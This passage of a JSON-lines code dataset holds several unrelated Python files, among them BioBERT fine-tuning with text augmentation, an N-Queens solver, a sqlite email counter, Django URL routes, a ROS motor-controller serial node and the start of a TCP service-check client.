format_time(time.time() - t0)\n # Report progress.\n print(' Batch {:>5,} of {:>5,}. Elapsed: {:}.'.format(step, len(train_dataloader), elapsed))\n tmp_dir = base_dir+'/epoch'+str(epoch_i+1)+'iteration'+str(step)\n ## save pretrained model\n evaluate_model(clf_model, validation_dataloader, tmp_dir)\n clf_model.train() ## model training mode\n # Calculate the average loss over the training data.\n avg_train_loss = total_loss / len(train_dataloader) \n \n # Store the loss value for plotting the learning curve.\n loss_values.append(avg_train_loss)\n # save the data after epochs\n tmp_dir = base_dir+'/epoch'+str(epoch_i+1)+'_done'\n ## save pretrained model\n evaluate_model(clf_model, validation_dataloader, tmp_dir)\n clf_model.train() ## model training mode\n\n### evaluate the performance of current model\ndef evaluate_model(clf_model, validation_dataloader, save_dir):\n \"\"\"\n :params[in]: clf_model, the pre-trained classifier\n :params[in]: validation_dataloader, the validation dataset\n :params[in]: save_dir, the directory name to save the fine-tuned model\n \n \"\"\"\n t0 = time.time()\n # Put the model in evaluation mode--the dropout layers behave differently\n # during evaluation.\n clf_model.eval()\n # Tracking variables \n eval_loss, eval_accuracy = 0, 0\n nb_eval_steps, nb_eval_examples = 0, 0\n true_labels,pred_labels=[],[]\n # Evaluate data for one epoch\n for batch in validation_dataloader:\n \n # Add batch to GPU\n batch = tuple(t.to(device) for t in batch)\n \n # Unpack the inputs from our dataloader\n b_input_ids, b_input_mask, b_labels = batch\n \n # Telling the model not to compute or store gradients, saving memory and\n # speeding up validation\n with torch.no_grad(): \n # Forward pass, calculate logit predictions.\n # This will return the logits rather than the loss because we have\n # not provided labels.\n # token_type_ids is the same as the \"segment ids\", which \n # differentiates sentence 1 and 2 in 2-sentence tasks.\n # The documentation for this `model` function is here: \n # https://huggingface.co/transformers/v2.2.0/model_doc/bert.html#transformers.BertForSequenceClassification\n outputs = clf_model(b_input_ids, \n token_type_ids=None, \n attention_mask=b_input_mask)\n \n # Get the \"logits\" output by the model. The \"logits\" are the output\n # values prior to applying an activation function like the softmax.\n logits = outputs[0]\n\n # Move logits and labels to CPU\n logits = logits.detach().cpu().numpy()\n label_ids = b_labels.to('cpu').numpy()\n\n # Calculate the accuracy for this batch of test sentences.\n tmp_eval_accuracy = flat_accuracy(logits, label_ids)\n ## pred_labels/true_labels in a batch flatten\n pred_flat = np.argmax(logits, axis=1).flatten()\n true_flat = label_ids.flatten()\n\n # true labels and predicted labels\n true_labels += true_flat.tolist()\n pred_labels += pred_flat.tolist()\n # Accumulate the total accuracy.\n eval_accuracy += tmp_eval_accuracy\n # Track the number of batches\n nb_eval_steps += 1\n\n # Report the final accuracy for this validation run\n if not os.path.exists(save_dir):\n os.makedirs(save_dir)\n clf_model.save_pretrained(save_dir) ## save model\n print(classification_report(true_labels, pred_labels,digits=3),\n file=open(save_dir+'/result.txt','a'))\n print(\" Accuracy: {0:.3f}\".format(eval_accuracy/nb_eval_steps),\n file=open(save_dir+'/result.txt','a'))\n\n# Easy data augmentation techniques for text classification\n#stop words list\n\nstop_words = ['i', 'me', 'my', 'myself', 'we', 'our', \n\t\t\t'ours', 'ourselves', 'you', 'your', 'yours', \n\t\t\t'yourself', 'yourselves', 'he', 'him', 'his', \n\t\t\t'himself', 'she', 'her', 'hers', 'herself', \n\t\t\t'it', 'its', 'itself', 'they', 'them', 'their', \n\t\t\t'theirs', 'themselves', 'what', 'which', 'who', \n\t\t\t'whom', 'this', 'that', 'these', 'those', 'am', \n\t\t\t'is', 'are', 'was', 'were', 'be', 'been', 'being', \n\t\t\t'have', 'has', 'had', 'having', 'do', 'does', 'did',\n\t\t\t'doing', 'a', 'an', 'the', 'and', 'but', 'if', 'or',\n\t\t\t'because', 'as', 'until', 'while', 'of', 'at', \n\t\t\t'by', 'for', 'with', 'about', 'against', 'between',\n\t\t\t'into', 'through', 'during', 'before', 'after', \n\t\t\t'above', 'below', 'to', 'from', 'up', 'down', 'in',\n\t\t\t'out', 'on', 'off', 'over', 'under', 'again', \n\t\t\t'further', 'then', 'once', 'here', 'there', 'when', \n\t\t\t'where', 'why', 'how', 'all', 'any', 'both', 'each', \n\t\t\t'few', 'more', 'most', 'other', 'some', 'such', 'no', \n\t\t\t'nor', 'not', 'only', 'own', 'same', 'so', 'than', 'too', \n\t\t\t'very', 's', 't', 'can', 'will', 'just', 'don', \n\t\t\t'should', 'now', '']\n\ndef get_only_chars(line):\n\n clean_line = \"\"\n\n line = line.replace(\"’\", \"\")\n line = line.replace(\"'\", \"\")\n line = line.replace(\"-\", \" \") #replace hyphens with spaces\n line = line.replace(\"\\t\", \" \")\n line = line.replace(\"\\n\", \" \")\n line = line.lower()\n\n for char in line:\n if char in 'qwertyuiopasdfghjklzxcvbnm ':\n clean_line += char\n else:\n clean_line += ' '\n\n clean_line = re.sub(' +',' ',clean_line) #delete extra spaces\n if clean_line[0] == ' ':\n clean_line = clean_line[1:]\n return clean_line\n\n########################################################################\n# Synonym replacement\n# Replace n words in the sentence with synonyms from wordnet\n########################################################################\n\n#for the first time you use wordnet\n\ndef synonym_replacement(words, n):\n\tnew_words = words.copy()\n\trandom_word_list = list(set([word for word in words if word not in stop_words]))\n\trandom.shuffle(random_word_list)\n\tnum_replaced = 0\n\tfor random_word in random_word_list:\n\t\tsynonyms = get_synonyms(random_word)\n\t\tif len(synonyms) >= 1:\n\t\t\tsynonym = random.choice(list(synonyms))\n\t\t\tnew_words = [synonym if word == random_word else word for word in new_words]\n\t\t\t#print(\"replaced\", random_word, \"with\", synonym)\n\t\t\tnum_replaced += 1\n\t\tif num_replaced >= n: #only replace up to n words\n\t\t\tbreak\n\t#this is stupid but we need it, trust me\n\tsentence = ' '.join(new_words)\n\tnew_words = sentence.split(' ')\n\n\treturn new_words\n\ndef get_synonyms(word):\n\tsynonyms = set()\n\tfor syn in wordnet.synsets(word): \n\t\tfor l in syn.lemmas(): \n\t\t\tsynonym = l.name().replace(\"_\", \" \").replace(\"-\", \" \").lower()\n\t\t\tsynonym = \"\".join([char for char in synonym if char in ' qwertyuiopasdfghjklzxcvbnm'])\n\t\t\tsynonyms.add(synonym) \n\tif word in synonyms:\n\t\tsynonyms.remove(word)\n\treturn list(synonyms)\n\n########################################################################\n# Random deletion\n# Randomly delete words from the sentence with probability p\n########################################################################\n\ndef random_deletion(words, p):\n\n\t#obviously, if there's only one word, don't delete it\n\tif len(words) == 1:\n\t\treturn words\n\n\t#randomly delete words with probability p\n\tnew_words = []\n\tfor word in words:\n\t\tr = random.uniform(0, 1)\n\t\tif r > p:\n\t\t\tnew_words.append(word)\n\n\t#if you end up deleting all words, just return a random word\n\tif len(new_words) == 0:\n\t\trand_int = random.randint(0, len(words)-1)\n\t\treturn [words[rand_int]]\n\n\treturn new_words\n\n########################################################################\n# Random swap\n# Randomly swap two words in the sentence n times\n########################################################################\n\ndef random_swap(words, n):\n\tnew_words = words.copy()\n\tfor _ in range(n):\n\t\tnew_words = swap_word(new_words)\n\treturn new_words\n\ndef swap_word(new_words):\n\trandom_idx_1 = random.randint(0, len(new_words)-1)\n\trandom_idx_2 = random_idx_1\n\tcounter = 0\n\twhile random_idx_2 == random_idx_1:\n\t\trandom_idx_2 = random.randint(0, len(new_words)-1)\n\t\tcounter += 1\n\t\tif counter > 3:\n\t\t\treturn new_words\n\tnew_words[random_idx_1], new_words[random_idx_2] = new_words[random_idx_2], new_words[random_idx_1] \n\treturn new_words\n\n########################################################################\n# Random insertion\n# Randomly insert n words into the sentence\n########################################################################\n\ndef random_insertion(words, n):\n\tnew_words = words.copy()\n\tfor _ in range(n):\n\t\tadd_word(new_words)\n\treturn new_words\n\ndef add_word(new_words):\n\tsynonyms = []\n\tcounter = 0\n\twhile len(synonyms) < 1:\n\t\trandom_word = new_words[random.randint(0, len(new_words)-1)]\n\t\tsynonyms = get_synonyms(random_word)\n\t\tcounter += 1\n\t\tif counter >= 10:\n\t\t\treturn\n\trandom_synonym = synonyms[0]\n\trandom_idx = random.randint(0, len(new_words)-1)\n\tnew_words.insert(random_idx, random_synonym)\n\n########################################################################\n# main data augmentation function\n########################################################################\n\ndef eda(sentence, alpha_sr=0.1, alpha_ri=0.1, alpha_rs=0.1, p_rd=0.1, num_aug=9):\n\t\n\tsentence = get_only_chars(sentence)\n\twords = sentence.split(' ')\n\twords = [word for word in words if word is not '']\n\tnum_words = len(words)\n\t\n\taugmented_sentences = []\n\tnum_new_per_technique = int(num_aug/4)+1\n\tn_sr = max(1, int(alpha_sr*num_words))\n\tn_ri = max(1, int(alpha_ri*num_words))\n\tn_rs = max(1, int(alpha_rs*num_words))\n\n\t#sr\n\tfor _ in range(num_new_per_technique):\n\t\ta_words = synonym_replacement(words, n_sr)\n\t\taugmented_sentences.append(' '.join(a_words))\n\n\t#ri\n\tfor _ in range(num_new_per_technique):\n\t\ta_words = random_insertion(words, n_ri)\n\t\taugmented_sentences.append(' '.join(a_words))\n\n\t#rs\n\tfor _ in range(num_new_per_technique):\n\t\ta_words = random_swap(words, n_rs)\n\t\taugmented_sentences.append(' '.join(a_words))\n\n\t#rd\n\tfor _ in range(num_new_per_technique):\n\t\ta_words = random_deletion(words, p_rd)\n\t\taugmented_sentences.append(' '.join(a_words))\n\n\taugmented_sentences = [get_only_chars(sentence) for sentence in augmented_sentences]\n\tshuffle(augmented_sentences)\n\n\t#trim so that we have the desired number of augmented sentences\n\tif num_aug >= 1:\n\t\taugmented_sentences = augmented_sentences[:num_aug]\n\telse:\n\t\tkeep_prob = num_aug / len(augmented_sentences)\n\t\taugmented_sentences = [s for s in augmented_sentences if random.uniform(0, 1) < keep_prob]\n\n\t#append the original sentence\n\taugmented_sentences.append(sentence)\n\n\treturn augmented_sentences\n\ndef augment_train(x_train, y_train, label_aug=2, num_aug=4):\n \"\"\" Use Data augmentation to augment training set\n :params[in]: x_train, training examples\n :params[in]: y_train, labels for training set\n :params[in]: label_aug, the label to do augmentation\n \n :params[in]: x_train,y_train, augmented training data\n \"\"\"\n x_train_urgent = [x for x,y in zip(x_train,y_train) if \\\n y==label_aug]\n ## augment sentences\n aug_sentences = []\n for sen0 in x_train_urgent:\n ## original sentence will be removed\n aug_sentences += eda(sen0, alpha_sr=0.05, alpha_ri=0.05, \\\n alpha_rs=0.05, p_rd=0.05, num_aug=num_aug)[:-1]\n ## append to the original data --only augment urgent sentences\n x_train += aug_sentences\n y_train += [label_aug]*len(aug_sentences)\n ## return augmented data\n return x_train, y_train\n\nif __name__=='__main__':\n tokenizer = AutoTokenizer.from_pretrained(\"biobert_v1.1_pubmed\", from_tf=True)\n ## set the padding\n tokenizer.pad_token = '[PAD]'\n # tokenizer.pad_token_id\n data0 = json.load(open('original_labelled_data.json', 'r'))\n sentences,labels = data0['sentences'],data0['labels']\n #lm_model = AutoModelWithLMHead.from_pretrained(\"biobert_v1.1_pubmed\", from_tf=True)\n ## split data into K-folds\n skf = StratifiedKFold(n_splits=5, shuffle=True, random_state=2020)\n skf.get_n_splits(sentences, labels)\n ## loop over train/test data splits\n split_index = 0 \n for train_index, test_index in skf.split(sentences, labels):\n split_index +=1\n x_train, x_test = [sentences[i] for i in train_index], [sentences[i] for i in test_index]\n y_train, y_test = [labels[i] for i in train_index], [labels[i] for i in test_index]\n ## augment training data\n x_train, y_train=augment_train(x_train, y_train, label_aug=2, num_aug=4)\n ## use preprocess_date function\n train_inputs,train_masks = preprocess_data(tokenizer, x_train, MAX_LEN = 256)\n validation_inputs,validation_masks = preprocess_data(tokenizer, x_test, MAX_LEN = 256)\n train_inputs = torch.tensor(train_inputs)\n validation_inputs = torch.tensor(validation_inputs)\n train_labels = torch.tensor(y_train)\n validation_labels = torch.tensor(y_test)\n train_masks = torch.tensor(train_masks)\n validation_masks = torch.tensor(validation_masks)\n ## initialize model\n clf_model=BertForSequenceClassification.from_pretrained(\"biobert_v1.1_pubmed\",\n num_labels=len(set(labels)),\n from_tf=True)\n # For fine-tuning BERT on a specific task, the authors recommend a batch size of\n # 16 or 32.\n batch_size = 4\n # Create the DataLoader for our training set.\n train_data = TensorDataset(train_inputs, train_masks, train_labels)\n train_sampler = RandomSampler(train_data)\n train_dataloader = DataLoader(train_data, sampler=train_sampler, batch_size=batch_size)\n # Create the DataLoader for our validation set.\n validation_data = TensorDataset(validation_inputs, validation_masks, validation_labels)\n validation_sampler = SequentialSampler(validation_data)\n validation_dataloader = DataLoader(validation_data, sampler=validation_sampler,\n batch_size=batch_size)\n base_dir = 'fine_tuned_bio_bert/bio_bert_augmentation_split_'+str(split_index)\n train_eval(clf_model, train_dataloader, validation_dataloader, base_dir, \\\n lr=2e-5, epochs=4, eval_every_num_iters=80, seed_val = 42) #weights=[100/127,100/191,100/34])\n","sub_path":"cross_validation_code_da.py","file_name":"cross_validation_code_da.py","file_ext":"py","file_size_in_byte":24267,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"397472418","text":"import json\nimport re\n\n\n\ndef get_doc_nums(doc_nums):\n '''\n 1纯数字要7-8位的,前面补零凑够八位\n 2D打头的都要,但是需要在D和��字之间补零,凑够8位\n 3wo打头的直接丢弃'''\n\n out = []\n for number in doc_nums:\n if re.match('WO.*?', number):\n continue\n\n if re.match('^\\d{7}$', number):\n # 七位纯数字,补零\n out.append('0' + number)\n continue\n\n if re.match('^\\d{8}$', number):\n # 八位纯数字\n out.append(number)\n continue\n\n if re.match('^D\\d{6}$', number):\n out.append(number[0] + '0' + number[1:])\n\n if re.match('^D\\d{7}$', number):\n out.append(number)\n\n return out\n\ndef read_json(filepath):\n with open(filepath, \"r\", encoding=\"utf-8\") as f:\n data=json.load(f)\n return data\n\n\ndef write_json(filepath,data):\n with open(filepath, \"w\", encoding=\"utf-8\") as f:\n f.write(json.dumps(data, indent=4))\n\n\nitems=read_json('h:/json/all_years_orgname_matched 1.json')\ndf=read_json('h:/json/citation of citation.json')\nprint(len(items))\n\ncount=0\nrecords=[]\nfor item in items:\n\n doc_nums=item['search_res']['citation']\n doc_nums=[doc_nums[key] for key in doc_nums.keys()]\n print(doc_nums)\n doc_nums=get_doc_nums(doc_nums)\n record={'file':'','search_res':[]}\n n=1\n for doc_num in doc_nums:\n for target in df:\n if 'US'+doc_num in target['search_res']['file']:\n print(target)\n if record['file']=='':\n record['file']=target['search_res']['file']\n record['search_res'].append(target['search_res'])\n print(n)\n n+=1\n\n records.append(record)\n count+=1\nprint(count)\nwrite_json(filepath='out.json',data=records)\n\n","sub_path":"数据集处理/健怡可乐-4-doc_nums整合信息/整合数据文件.py","file_name":"整合数据文件.py","file_ext":"py","file_size_in_byte":1849,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"223585837","text":"# Instead of using arrays to store each result\n# I return 1 if it exists\n\nclass Solution:\n \"\"\"\n Calculate the total number of distinct N-Queen solutions.\n @param n: The number of queens.\n @return: The total number of distinct solutions.\n \"\"\"\n\n def totalNQueens(self, n):\n # write your code here\n if n < 1:\n return []\n res = self.search(n, [])\n return res\n\n def isValid(self, cols, row):\n m = len(cols)\n for i in range(m):\n if abs(row - cols[i]) == m - i:\n return False\n if row == cols[i]:\n return False\n return True\n\n def search(self, n, cols):\n if len(cols) == n:\n return 1\n\n res = 0\n for i in range(n):\n if not self.isValid(cols, i):\n continue\n cols.append(i)\n tmp = self.search(n, cols)\n res += tmp\n cols.pop()\n return res\n","sub_path":"leetcode/052-N-Queens-II/NQueens_004.py","file_name":"NQueens_004.py","file_ext":"py","file_size_in_byte":971,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"179583620","text":"import sqlite3\r\nimport urllib.request, urllib.parse, urllib.error\r\n\r\nconn = sqlite3.connect('emailexercise.sqllite')\r\ncur = conn.cursor()\r\n\r\ncur.execute('DROP TABLE IF EXISTS Counts')\r\n\r\ncur.execute('CREATE TABLE Counts (Email TEXT, count INTEGER)')\r\n\r\nfh = open('C:\\\\Users\\Gaurav Shubham\\Desktop\\gaurav.txt', 'r')\r\nfor line in fh:\r\n if not line.startswith('From: '):\r\n continue\r\n pieces = line.split()\r\n email = pieces[1]\r\n cur.execute('SELECT count FROM Counts WHERE email = ? ', (email,))\r\n row = cur.fetchone()\r\n if row is None:\r\n cur.execute('INSERT INTO Counts (email,count) VALUES (?,1)', (email,))\r\n else:\r\n cur.execute('UPDATE Counts SET count = count + 1 WHERE email = ?', (email,))\r\n conn.commit()\r\n\r\nsqlstr = 'SELECT email,count FROM Counts ORDER BY count DESC LIMIT 1000'\r\n\r\nfor row in cur.execute(sqlstr):\r\n print(str(row[0]), row[1])\r\n print('Done and dusted')\r\n","sub_path":"extra.py","file_name":"extra.py","file_ext":"py","file_size_in_byte":928,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"121681085","text":"from django.conf.urls import url, include\nfrom django.contrib import admin\n\nfrom moon_tracker import views\n\nurlpatterns = [\n url(r'^system/(?P.+)/(?P[0-9]+)/(?P[0-9]+)/$', views.moon_detail, name='moon_detail'),\n url(r'^system/(?P.+)/$', views.list_system, name='list_system'),\n url(r'^constellation/(?P.+)/$', views.SolarSystemListView.as_view(), name='list_constellation'),\n url(r'^region/(?P.+)/$', views.ConstellationListView.as_view(), name='list_region'),\n url(r'^submit/$', views.batch_submit, name='batch_submit'),\n url(r'^$', views.RegionListView.as_view(), name='list_universe'),\n]\n","sub_path":"elmo/moon_tracker/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":663,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"86416411","text":"#!/usr/bin/env python\nimport rospy\nfrom roboteq_interface.msg import motor_commands\nfrom roboteq_interface.msg import speed2_data\nimport serial\nimport struct\nimport time\n\ncallback_time = 0.0\n\ndef openPort():\n\tglobal port_open\n\tglobal ser\n\techof_plus = False\n\techof_timeout = 0.1\n\tser=serial.Serial(\"/dev/ttyACM1\",115200,serial.EIGHTBITS,serial.PARITY_NONE,serial.STOPBITS_ONE,0,False,False,None,False,None)\n\tser.flushInput()\n\tser.flushOutput()\n\t#rospy.loginfo(\"Opened Controller 2\")\n\twhile not echof_plus:\n\t\tser.write(\"^ECHOF 1\\r\")\n\t\tn = readChar(ser,1.0)\n\t\tinitial_time = time.clock()\n\t\tcurrent_time = time.clock()\n\t\twhile (not checkChar(n,b'\\x2B')) and ((current_time - initial_time) <= echof_timeout):\n\t\t\t#rospy.loginfo(\"Looping for ECHOF +\")\n\t\t\tn = readChar(ser,1.0)\n\t\t\tif checkChar(n,b'\\x2B'):\n\t\t\t\techof_plus = True\n\t\t\tcurrent_time = time.clock()\n\tn = readChar(ser,1.0)\n\twhile not checkChar(n,b'\\x0D'):\n\t\tn = readChar(ser,1.0)\n\t\t#rospy.loginfo(\"Looping for ECHOF CR\")\n\t#rospy.loginfo(\"Read ECHOF + and CR\")\n\tport_open = True\n\ndef callback(msg_in):\n\tglobal motor_1_speed\n\tglobal motor_2_speed\n\tglobal callback_time\n\tmotor_1_speed = msg_in.cont_2_motor_1_speed_cmd\n\tmotor_2_speed = msg_in.cont_2_motor_2_speed_cmd\n\tcallback_time = time.clock()\n\ndef mis_speed2_node():\n\tglobal ser\n\tglobal motor_1_speed\n\tglobal motor_2_speed\n\tglobal encoder_1_sign\n\tglobal encoder_2_sign\n\tglobal RPM_1_sign\n\tglobal RPM_2_sign\n\tglobal port_open\n\tglobal callback_time\n\tpub = rospy.Publisher('mis/speed2_data', speed2_data)\n\tsub = rospy.Subscriber('mis/motor_commands',motor_commands,callback)\n\trospy.init_node('mis_speed2_node')\n\tmsg_out = speed2_data()\n\tmotor_1_speed = 0\n\tmotor_2_speed = 0\n\tcallback_timeout = 1.0\n\tp = ''\n\tport_open = False\n\twhile not port_open:\n\t\ttry:\n\t\t\topenPort()\n\t\texcept serial.SerialException:\n\t\t\t#rospy.loginfo(\"Controller 2 not open\")\n\t\t\tpass\n\twhile not rospy.is_shutdown():\n\t\tcurrent_time = time.clock()\n\t\tif (current_time - callback_time) >= callback_timeout:\n\t\t\tmotor_1_speed = 0\n\t\t\tmotor_2_speed = 0\n\t\tout_buff1 = \"!G 1 \"+str(motor_1_speed)+\"\\r\"\n\t\tser.write(out_buff1)\n\t\tp = readChar(ser,1.0)\n\t\twhile p != b'\\x2B':\n\t\t\tp = readChar(ser,1.0)\n\t\t\t#rospy.loginfo(\"Looping for first +\")\n\t\tp = readChar(ser,1.0)\n\t\twhile p != b'\\x0D':\n\t\t\tp = readChar(ser,1.0)\n\t\t\t#rospy.loginfo(\"Looping for first CR\")\n\t\tout_buff2 = \"!G 2 \"+str(motor_2_speed)+\"\\r\"\n\t\tser.write(out_buff2)\n\t\tp = readChar(ser,1.0)\n\t\twhile p != b'\\x2B':\n\t\t\tp = readChar(ser,1.0)\n\t\t\t#rospy.loginfo(\"Looping for second +\")\n\t\tp = readChar(ser,1.0)\n\t\twhile p != b'\\x0D':\n\t\t\tp = readChar(ser,1.0)\n\t\t\t#rospy.loginfo(\"Looping for first CR\")\n\t\tser.write(\"?C\\r\") # Request Absolute Encoder Counts\n\t\tm=readChar(ser,1.0)\n\t\t#rospy.loginfo(\"Looking for C, Actually Read %d\",ord(m))\n\t\tif checkChar(m,b'\\x43') == True:\n\t\t\t#rospy.loginfo(\"Read C\")\n\t\t\tm=readChar(ser,0.1)\n\t\t\t#rospy.loginfo(m)\n\t\t\tif checkChar(m,b'\\x3D') == True:\n\t\t\t\t#rospy.loginfo(\"Read =\")\n\t\t\t\ti=0\n\t\t\t\treading = True\n\t\t\t\tmotor_1_encoder_count = 0\n\t\t\t\tmotor_2_encoder_count = 0\n\t\t\t\tread_second_encoder = False # False means motor channel 1; True means motor channel 2\n\t\t\t\tencoder_1_sign = 1.0\n\t\t\t\tencoder_2_sign = 1.0\n\t\t\t\twhile reading == True:\n\t\t\t\t\tm=readChar(ser,0.1)\n\t\t\t\t\tif m == \"\\r\":\n\t\t\t\t\t\t#rospy.loginfo(\"Read end of line\")\n\t\t\t\t\t\treading = False\n\t\t\t\t\telse:\n\t\t\t\t\t\tif m == b'\\x3A':\n\t\t\t\t\t\t\t#rospy.loginfo(\"Read colon\")\n\t\t\t\t\t\t\tread_second_encoder = True\n\t\t\t\t\t\t\tm=readChar(ser,0.1)\n\t\t\t\t\t\tif read_second_encoder == False:\n\t\t\t\t\t\t\tif m == b'\\x2D':\n\t\t\t\t\t\t\t\t#rospy.loginfo(\"Read minus\")\n\t\t\t\t\t\t\t\tencoder_1_sign = -1.0\n\t\t\t\t\t\t\t\tm=readChar(ser,0.1)\n\t\t\t\t\t\t\tmotor_1_encoder_count = motor_1_encoder_count*10+int(m)\n\t\t\t\t\t\t\treading = True\n\t\t\t\t\t\t\tread_second_encoder = False\n\t\t\t\t\t\telse:\n\t\t\t\t\t\t\tif m == b'\\x2D':\n\t\t\t\t\t\t\t\t#rospy.loginfo(\"Read minus\")\n\t\t\t\t\t\t\t\tencoder_2_sign = -1.0\n\t\t\t\t\t\t\t\tm=readChar(ser,0.1)\n\t\t\t\t\t\t\tmotor_2_encoder_count = motor_2_encoder_count*10+int(m)\n\t\t\t\t\t\t\treading = True\n\t\t\t\t\t\t\tread_second_encoder = True\n\t\t\t\tmsg_out.motor_1_encoder_count = motor_1_encoder_count*encoder_1_sign\n\t\t\t\tmsg_out.motor_2_encoder_count = motor_2_encoder_count*encoder_2_sign\n\t\tser.write(\"?S\\r\") # Request RPM\n\t\tm=readChar(ser,1.0)\n\t\tif checkChar(m,b'\\x53'):\n\t\t\t#rospy.loginfo(\"Read S\")\n\t\t\tm=readChar(ser,0.1)\n\t\t\t#rospy.loginfo(m)\n\t\t\tif checkChar(m,b'\\x3D'):\n\t\t\t\t#rospy.loginfo(\"Read =\")\n\t\t\t\ti=0\n\t\t\t\treading = True\n\t\t\t\tmotor_1_RPM = 0\n\t\t\t\tmotor_2_RPM = 0\n\t\t\t\tread_second_RPM = False # False means motor channel 1; True means motor channel 2\n\t\t\t\tRPM_1_sign = 1.0\n\t\t\t\tRPM_2_sign = 1.0\n\t\t\t\twhile reading == True:\n\t\t\t\t\tm=readChar(ser,0.1)\n\t\t\t\t\tif m == \"\\r\":\n\t\t\t\t\t\t#rospy.loginfo(\"Read end of line\")\n\t\t\t\t\t\treading = False\n\t\t\t\t\telse:\n\t\t\t\t\t\tif m == b'\\x3A':\n\t\t\t\t\t\t\t#rospy.loginfo(\"Read colon\")\n\t\t\t\t\t\t\tread_second_RPM = True\n\t\t\t\t\t\t\tm=readChar(ser,0.1)\n\t\t\t\t\t\tif read_second_RPM == False:\n\t\t\t\t\t\t\tif m == b'\\x2D':\n\t\t\t\t\t\t\t\t#rospy.loginfo(\"Read minus\")\n\t\t\t\t\t\t\t\tRPM_1_sign = -1.0\n\t\t\t\t\t\t\t\tm=readChar(ser,0.1)\n\t\t\t\t\t\t\tmotor_1_RPM = motor_1_RPM*10+int(m)\n\t\t\t\t\t\t\treading = True\n\t\t\t\t\t\t\tread_second_RPM = False\n\t\t\t\t\t\telse:\n\t\t\t\t\t\t\tif m == b'\\x2D':\n\t\t\t\t\t\t\t\t#rospy.loginfo(\"Read minus\")\n\t\t\t\t\t\t\t\tRPM_2_sign = -1.0\n\t\t\t\t\t\t\t\tm=readChar(ser,0.1)\n\t\t\t\t\t\t\tmotor_2_RPM = motor_2_RPM*10+int(m)\n\t\t\t\t\t\t\treading = True\n\t\t\t\t\t\t\tread_second_RPM = True\n\t\t\t\tmsg_out.motor_1_RPM = motor_1_RPM*RPM_1_sign\n\t\t\t\tmsg_out.motor_2_RPM = motor_2_RPM*RPM_2_sign\n\t\tpub.publish(msg_out)\n\t\tprior_time = time.clock()\n\t\tr = rospy.Rate(50)\n\t\tr.sleep()\n\ndef readChar(ser,timeout_time):\n\tinitial_time = time.clock()\n\ttimeout = False\n\tm = ser.read(1)\n\twhile (len(m) == 0) and (timeout == False):\n\t\tm = ser.read(1)\n\t\tcurrent_time = time.clock()\n\t\tif (current_time - initial_time) >= timeout_time:\n\t\t\ttimeout = True\n\t\telse:\n\t\t\ttimeout = False\n\treturn m\n\t\ndef checkChar(m,desired_char_hex):\n\tif m == desired_char_hex:\n\t\treturn True\n\telse:\n\t\treturn False\n\nif __name__ == '__main__':\n try:\n mis_speed2_node()\n except rospy.ROSInterruptException:\n pass\n","sub_path":"roboteq_interface/scripts/mis_speed2_node.py","file_name":"mis_speed2_node.py","file_ext":"py","file_size_in_byte":5906,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"575169368","text":"#! /usr/bin/env python\n#coding=utf-8\n###########################################################################\n#\n#\n#此软件版权为深圳商之杰科技有限公司所有,更多信息请访问www.netbase.asia\n#\n#\n###########################################################################\n\n__doc__ = \"\"\"\nip服务客户端\n\"\"\"\n\nimport re\nfrom twisted.internet import reactor,protocol,defer\nfrom products.netUtils.Utils import unused\nimport logging\nlog = logging.getLogger(\"netipservice\")\nfrom socket import getfqdn\nhostname = getfqdn()\n\nclass ZenTcpTest(protocol.Protocol):\n \"\"\"\n 功能:通过twisted框架创建TCP/IP连接远程连接ip服务并返回结果\n 作者:wl\n 时间:2013.1.30\n \"\"\"\n defer = None\n data = \"\"\n\n def connectionMade(self):\n \"\"\"\n 功能:twisted框架,成功创建连接,发送测试数据\n 作者:wl\n 时间:2013.1.30\n \"\"\"\n log.debug(\"Connected to %s\" % self.transport.getPeer().host)\n self.factory.msg = \"pass\"\n self.cfg = self.factory.cfg\n\n if self.cfg.sendString:\n sendString = self.cfg.sendString.decode(\"string_escape\")\n log.debug(\"Sending: %s\",sendString)\n self.transport.write(sendString)\n\n if self.cfg.expectRegex:\n log.debug(\"Waiting for results to check against regex '%s'\",\n self.cfg.expectRegex)\n self.defer = reactor.callLater(self.cfg.timeout,self.expectTimeout)\n else:\n self.loseConnection()\n\n def dataReceived(self,data):\n \"\"\"\n 功能:twisted框架,数据接收函数,正则匹配接收到的数据\n 参数:接收到的数据\n 作者:wl\n 时间:2013.1.30\n \"\"\"\n log.debug(\"%s %s received data: %s\",self.cfg.manageIp,\n self.cfg.title,data)\n self.data += data\n if self.cfg.expectRegex:\n if re.search(self.cfg.expectRegex,data):\n log.debug(\"Found %s in '%s' -- closing connection\",\n self.cfg.expectRegex,data)\n self.loseConnection()\n else:\n log.debug(\"No match for %s in '%s' -- looking for more data\",\n self.cfg.expectRegex,data)\n\n def expectTimeout(self):\n \"\"\"\n 功能:数据交互超时处理函数\n 作者:wl\n 时间:2013.1.30\n \"\"\"\n msg = \"IP Service %s TIMEOUT waiting for '%s'\" % (\n self.cfg.title,self.cfg.expectRegex)\n log.debug(\"%s %s\",self.cfg.manageIp,msg)\n self.factory.msg = msg\n self.loseConnection()\n\n def loseConnection(self):\n \"\"\"\n 功��:twisted框架,连接断开后处理函数\n 作者:wl\n 时间:2013.1.30\n \"\"\"\n ip,port = self.transport.addr\n log.debug(\"Closed connection to %s on port %s for %s\",\n ip,port,self.cfg.title)\n self.data = \"\"\n try:\n self.defer.cancel()\n except:\n self.defer = None\n self.transport.loseConnection()\n\n\nclass NetTcpClient(protocol.ClientFactory):\n \"\"\"\n 功能:twisted框架,client类,启动tcp连接\n 作者:wl\n 时间:2013.1.30\n \"\"\"\n protocol = ZenTcpTest\n msg = \"pass\"\n deferred = None\n\n def __init__(self,svc,status):\n self.cfg = svc\n self.status = status\n\n def clientConnectionLost(self,connector,reason):\n \"\"\"\n 功能:twisted框架,client类,连接断开处理函数\n 参数:twisted protocol对象,twisted error对象\n 作者:wl\n 时间:2013.1.30\n \"\"\"\n unused(connector)\n errorMsg = reason.getErrorMessage()\n if errorMsg != 'Connection was closed cleanly.':\n log.debug(\"Lost connection to %s 